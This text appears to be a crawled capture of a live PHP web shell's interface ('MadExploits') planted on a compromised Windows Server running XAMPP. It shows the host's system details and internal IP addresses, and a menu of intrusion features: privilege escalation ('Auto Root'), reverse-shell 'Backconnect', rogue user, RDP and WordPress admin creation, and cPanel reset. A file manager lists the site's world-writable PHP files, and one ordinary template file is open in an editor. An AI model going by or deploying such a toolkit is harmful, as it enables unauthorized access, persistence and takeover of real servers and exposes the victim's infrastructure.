Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
htdocs /
edgpens /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
bak.sql
0
B
-rw-rw-rw-
config.php
6.25
KB
-rw-rw-rw-
external.json
81
B
-rw-rw-rw-
f_start.php
3.26
KB
-rw-rw-rw-
page_footer.php
220
B
-rw-rw-rw-
page_head.php
3.43
KB
-rw-rw-rw-
page_header.php
4.78
KB
-rw-rw-rw-
page_header_200423.php
3.23
KB
-rw-rw-rw-
page_header_230312.php
4.27
KB
-rw-rw-rw-
page_sidebar.php
17.64
KB
-rw-rw-rw-
page_sidebar_alt.php
3.94
KB
-rw-rw-rw-
template_end.php
1.46
KB
-rw-rw-rw-
template_scripts.php
1.43
KB
-rw-rw-rw-
template_scripts_200430.php
657
B
-rw-rw-rw-
template_scripts_notinclude.ph...
2.68
KB
-rw-rw-rw-
template_start.php
16.75
KB
-rw-rw-rw-
template_start_200728.php
8.67
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : page_head.php
<?php /** * page_head.php * * Author: pixelcave * * The head of each page * */ ?> <!-- Page Wrapper --> <!-- In the PHP version you can set the following options from inc/config file --> <!-- Available classes: 'page-loading' enables page preloader --> <div id="page-wrapper"<?php if ($template['page_preloader']) { echo ' class="page-loading"'; } ?>> <!-- Preloader --> <!-- Preloader functionality (initialized in js/app.js) - pageLoading() --> <!-- Used only if page preloader enabled from inc/config (PHP version) or the class 'page-loading' is added in #page-wrapper element (HTML version) --> <div class="preloader"> <div class="inner"> <!-- Animation spinner for all modern browsers --> <div class="preloader-spinner themed-background hidden-lt-ie10"></div> <!-- Text for IE9 --> <h3 class="text-primary visible-lt-ie10"><strong>Loading..</strong></h3> </div> </div> <!-- END Preloader --> <!-- Page Container --> <!-- In the PHP version you can set the following options from inc/config file --> <!-- Available #page-container classes: 'sidebar-light' for a light main sidebar (You can add it along with any other class) 'sidebar-visible-lg-mini' main sidebar condensed - Mini Navigation (> 991px) 'sidebar-visible-lg-full' main sidebar full - Full Navigation (> 991px) 'sidebar-alt-visible-lg' alternative sidebar visible by default (> 991px) (You can add it along with any other class) 'header-fixed-top' has to be added only if the class 'navbar-fixed-top' was added on header.navbar 'header-fixed-bottom' has to be added only if the class 'navbar-fixed-bottom' was added on header.navbar 'fixed-width' for a fixed width layout (can only be used with a static header/main sidebar layout) 'enable-cookies' enables cookies for remembering active color theme when changed from the sidebar links (You can add it along with any other class) --> <?php $page_classes = ''; if ($template['header'] == 'navbar-fixed-top') { $page_classes = 'header-fixed-top'; } else if ($template['header'] == 'navbar-fixed-bottom') { $page_classes = 'header-fixed-bottom'; } if ($template['sidebar']) { $page_classes .= (($page_classes == '') ? '' : ' ') . $template['sidebar']; } if ($template['layout'] == 'fixed-width' && $template['header'] == '') { $page_classes .= (($page_classes == '') ? '' : ' ') . $template['layout']; } if ($template['cookies'] === 'enable-cookies') { $page_classes .= (($page_classes == '') ? '' : ' ') . $template['cookies']; } ?> <div id="page-container"<?php if ($page_classes) { echo ' class="' . $page_classes . '"'; } ?>> <?php if ($template['inc_sidebar_alt']) { include 'inc/' . $template['inc_sidebar_alt'] . '.php'; } ?> <?php if ($template['inc_sidebar']) { include 'inc/' . $template['inc_sidebar'] . '.php'; } ?> <!-- Main Container --> <div id="main-container"> <?php if ($template['inc_header']) { include 'inc/' . $template['inc_header'] . '.php'; } ?>
Close